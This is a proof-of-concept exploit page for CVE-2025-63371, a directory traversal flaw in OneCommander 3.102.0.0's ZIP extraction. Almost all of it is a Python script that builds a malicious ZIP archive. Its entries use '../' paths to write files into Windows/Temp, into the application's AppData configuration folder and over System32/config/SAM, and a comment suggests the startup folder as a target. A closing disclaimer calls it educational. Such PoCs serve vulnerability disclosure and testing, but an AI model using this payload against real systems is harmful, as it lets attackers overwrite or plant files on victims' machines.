CVE-2025-63371 OneCommander ZIP文件目录遍历漏洞

#!/usr/bin/env python3 """ CVE-2025-63371 PoC - OneCommander Directory Traversal in ZIP Extraction This PoC demonstrates how a malicious ZIP file can be crafted to exploit the directory traversal vulnerability in OneCommander 3.102.0.0 """ import zipfile import os def create_malicious_zip(output_path): """ Create a malicious ZIP file with directory traversal payloads. The file paths contain '../' sequences to escape the intended extraction directory. """ with zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED) as zipf: # Path traversal to write file outside intended directory # This could be used to write to startup folder, system32, etc. malicious_file_path = '../../../Windows/Temp/pwned.txt' zipf.writestr(malicious_file_path, 'Arbitrary file written via directory traversal!') # Another example: attempt to overwrite configuration config_traversal = '../../../AppData/Roaming/OneCommander/malicious_config.txt' zipf.writestr(config_traversal, 'Malicious configuration data') # Read arbitrary file via traversal read_traversal = '../../../Windows/System32/config/SAM' zipf.writestr(read_traversal, 'Attempt to read SAM file') print(f'[+] Malicious ZIP created: {output_path}') print(f'[+] Contains path traversal entries to demonstrate CVE-2025-63371') def verify_zip_contents(zip_path): """Verify the contents of the created ZIP file""" with zipfile.ZipFile(zip_path, 'r') as zipf: print('\n[+] ZIP file contents:') for info in zipf.infolist(): print(f' - {info.filename}') if __name__ == '__main__': output_file = 'CVE-2025-63371_poc.zip' create_malicious_zip(output_file) verify_zip_contents(output_file) print('\n[!] This PoC is for educational and security testing purposes only.') print('[!] Do not use for malicious activities.')